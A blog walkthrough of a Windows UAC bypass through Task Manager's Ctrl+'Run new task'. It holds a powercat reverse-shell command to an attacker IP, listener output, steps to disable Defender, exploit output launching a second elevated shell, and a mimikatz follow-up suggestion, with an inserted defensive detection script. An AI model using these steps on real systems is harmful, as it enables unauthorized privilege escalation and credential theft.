Easy UAC bypass using Task Manager
The primary objective of this writeup is to check whether an attacker can use this technique to bypass UAC and gain additional privileges using ONLY a Command Prompt or PowerShell window obtained from a reverse shell.
User Account Control (UAC) in Windows is a “feature” (I am not sure what else to call it) which can be used to prevent a user from making unwanted changes to the system. When an application needs to run with elevated permissions, Windows asks the user whether the action is actually legitimate. This gives the user the option to deny any process that is trying to perform actions as “Administrator”.
As per Microsoft:
User Account Control (UAC) is a Windows security feature designed to protect the operating system from unauthorized changes. When changes to the system require administrator-level permission, UAC notifies the user, giving the opportunity to approve or deny the change. UAC improves the security of Windows devices by limiting the access that malicious code has to execute with administrator privileges. UAC empowers users to make informed decisions about actions that may affect the stability and security of their device.
Even if you log in to Windows as an Administrator user, the permissions needed to make system changes are not granted by default. Only after you confirm the UAC prompt are the necessary privileges given to the user. We can see the difference in the screenshot below:
The difference between the two PowerShell windows is UAC elevation. We can easily see the permission difference between them.
Now if an attacker is able to access your system, there is almost no way to change the permissions from a normal user to Administrator unless they have RDP access, because, as far as I know, UAC is user-interface based and there is no way to do it via a Command Prompt. There are a few techniques which allow an attacker to bypass UAC and gain more permissions to make system changes. In this post I would like to share a technique I have just learned.
Interestingly, there is a “feature” in Task Manager where if you click on “Run new task” while holding Ctrl, a Command Prompt comes up with Administrator privilege WITHOUT any UAC request. You can see this in both Windows 10 (1703) and Windows 11 (22H2):
And the same thing in Windows 11:
I really wanted to share the source from which I obtained this information but unfortunately, I forgot it. You can find additional information in Reference 1 if you want.
As bypassing Microsoft Defender is not the primary concern, I will disable it by running a command before starting anything, as most of the commands / scripts used here are considered malicious in nature and would be blocked.
We will be using two separate reverse shells: one is a regular shell with no additional permissions and the other will be started by the code which runs the “exploit”.
Let's download the powercat script and add the following:
powercat -c 192.168.0.17 -p 8888 -e cmd.exe
192.168.0.17 is my attacking VM. Now if we run powercat we should get the reverse shell:
$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [192.168.0.17] from (UNKNOWN) [192.168.0.16] 49900
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Users\user1>
C:\Users\user1>whoami
whoami
desktop-t26ftc0\user1

C:\Users\user1>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
As we can see, the privileges we have are the normal ones and do not allow us to perform any administrative functions.
From Reference 1, let's download the code and build it using Visual Studio (ConsoleApplication1.exe). The code originally echoes some text into the window. I would like to change it so that it runs a reverse shell which I have obtained and compiled from Reference 2. The second reverse shell (re.exe) would use port 4444.
After we build the “exploit” code which runs re.exe, it will send out another reverse shell to port 4444. Let's open another listener in a second window and execute the “exploit” code from the first reverse shell.
C:\Users\user1>cd "C:\Users\user1\source\repos\ConsoleApplication1\x64\Release"
cd "C:\Users\user1\source\repos\ConsoleApplication1\x64\Release"

C:\Users\user1\source\repos\ConsoleApplication1\x64\Release>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 1AF6-1DD9

 Directory of C:\Users\user1\source\repos\ConsoleApplication1\x64\Release

09/02/2023  12:40 PM    <DIR>          .
09/02/2023  12:40 PM    <DIR>          ..
09/02/2023  12:40 PM            15,872 ConsoleApplication1.exe
09/02/2023  12:40 PM           634,880 ConsoleApplication1.pdb
               2 File(s)        650,752 bytes
               2 Dir(s)   4,807,606,272 bytes free

C:\Users\user1\source\repos\ConsoleApplication1\x64\Release>ConsoleApplication1.exe
ConsoleApplication1.exe
Task Manager window found
High IL cmd.exe window found
The string 'cmd /c C:\users\user1\Desktop\re.exe' has been sent to the High IL cmd.exe!
Current process respawned with UIAccess flag

C:\Users\user1\source\repos\ConsoleApplication1\x64\Release>
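The output above shows the chain a defender can look for: Task Manager spawns a High-integrity cmd.exe, and that console then launches re.exe from the user's profile. The following is an added detection example, not code from this post or from the exploit project it references. It walks Sysmon-style process-creation records (Event ID 1 field names: Image, ParentImage, IntegrityLevel, ProcessGuid, ParentProcessGuid, CommandLine), flags consoles whose parent is Taskmgr.exe at High integrity, and then taints everything those consoles go on to launch. The event records are constructed sample data and the ProcessGuid values are placeholders; the re.exe path is the one shown in the output above.

```python
"""Detection sketch: console processes spawned by Task Manager at High integrity,
plus anything they go on to launch. Added example, not code from the original post;
field names follow Sysmon Event ID 1, and the sample events below are constructed."""
import ntpath

# Console hosts that give a hands-on elevated shell when spawned by Task Manager.
CONSOLE_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _base(path):
    """Case-insensitive basename of a Windows path (r'C:\\Windows\\System32\\cmd.exe' -> 'cmd.exe')."""
    return ntpath.basename(path).lower()


def find_taskmgr_elevated_consoles(events):
    """Scan process-creation events (assumed to be in chronological order).

    Returns a list of (rule, ProcessGuid, CommandLine) tuples:
      * 'taskmgr_spawned_elevated_console' for a High-IL console whose parent is Taskmgr.exe
      * 'descendant_of_taskmgr_console'   for anything launched from such a console or
        from its descendants, which is where a second stage shows up.
    """
    alerts = []
    tainted = set()  # ProcessGuids of flagged consoles and their descendants
    for ev in events:
        guid = ev["ProcessGuid"]
        if (_base(ev.get("ParentImage", "")) == "taskmgr.exe"
                and _base(ev.get("Image", "")) in CONSOLE_IMAGES
                and ev.get("IntegrityLevel") == "High"):
            tainted.add(guid)
            alerts.append(("taskmgr_spawned_elevated_console", guid, ev.get("CommandLine", "")))
        elif ev.get("ParentProcessGuid") in tainted:
            tainted.add(guid)
            alerts.append(("descendant_of_taskmgr_console", guid, ev.get("CommandLine", "")))
    return alerts


# Constructed sample telemetry (not real logs). GUIDs G0..G6 are placeholders.
SAMPLE_EVENTS = [
    # Explorer starts Task Manager; for an admin user it runs elevated. Not a console: no alert.
    {"ProcessGuid": "G1", "ParentProcessGuid": "G0",
     "Image": r"C:\Windows\System32\Taskmgr.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "High", "CommandLine": "Taskmgr.exe"},
    # Console spawned by Task Manager at High integrity: the pattern the post describes.
    {"ProcessGuid": "G2", "ParentProcessGuid": "G1",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\Taskmgr.exe",
     "IntegrityLevel": "High", "CommandLine": "cmd.exe"},
    # The 'cmd /c ...' line typed into that console (string as shown in the post's output).
    {"ProcessGuid": "G3", "ParentProcessGuid": "G2",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "IntegrityLevel": "High", "CommandLine": r"cmd /c C:\users\user1\Desktop\re.exe"},
    # Second stage launched from the user's profile: caught through the taint set.
    {"ProcessGuid": "G4", "ParentProcessGuid": "G3",
     "Image": r"C:\Users\user1\Desktop\re.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "IntegrityLevel": "High", "CommandLine": r"C:\users\user1\Desktop\re.exe"},
    # Ordinary non-elevated shell from Explorer: must not alert.
    {"ProcessGuid": "G5", "ParentProcessGuid": "G0",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "Medium", "CommandLine": "cmd.exe"},
    # Task Manager launching a non-console program: not covered by this rule.
    {"ProcessGuid": "G6", "ParentProcessGuid": "G1",
     "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\System32\Taskmgr.exe",
     "IntegrityLevel": "High", "CommandLine": "notepad.exe"},
]


if __name__ == "__main__":
    for rule, guid, cmdline in find_taskmgr_elevated_consoles(SAMPLE_EVENTS):
        print(f"{rule:35} {guid:4} {cmdline}")
```

A legitimate administrator using Ctrl + “Run new task” produces exactly the first event, so the first rule on its own is a lead rather than proof. The descendant rule is what separates the walkthrough above from routine admin work: an executable started from a user's Desktop by a Task Manager-spawned console, followed by an outbound connection from that process, is worth an analyst's time. The logic depends on the telemetry carrying an integrity level; Sysmon records it as IntegrityLevel, whereas Windows Security event 4688 exposes a Mandatory Label field that would need to be mapped first.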
We should get another reverse shell as shown below:
As we can see, we have elevated our privileges and have the additional permissions needed to perform system operations, without the user seeing a UAC prompt or anything else. Now we can perform additional operations like running mimikatz to gain additional information, and if the workstation is joined to an Active Directory domain, the consequences could be severe.
I have also tested this on Windows 11 and it works.
The information provided on this website is for educational and informational purposes only. The website owner and contributors do not condone or encourage any illegal activities, including hacking, cyberattacks, or unauthorized access to computer systems or networks.
All information and tools provided on this website are to be used at your own risk. We do not take any responsibility for how you choose to use the information or tools provided here. Users are strongly encouraged to conduct their own research and follow ethical guidelines and legal regulations when using the information and tools presented on this website.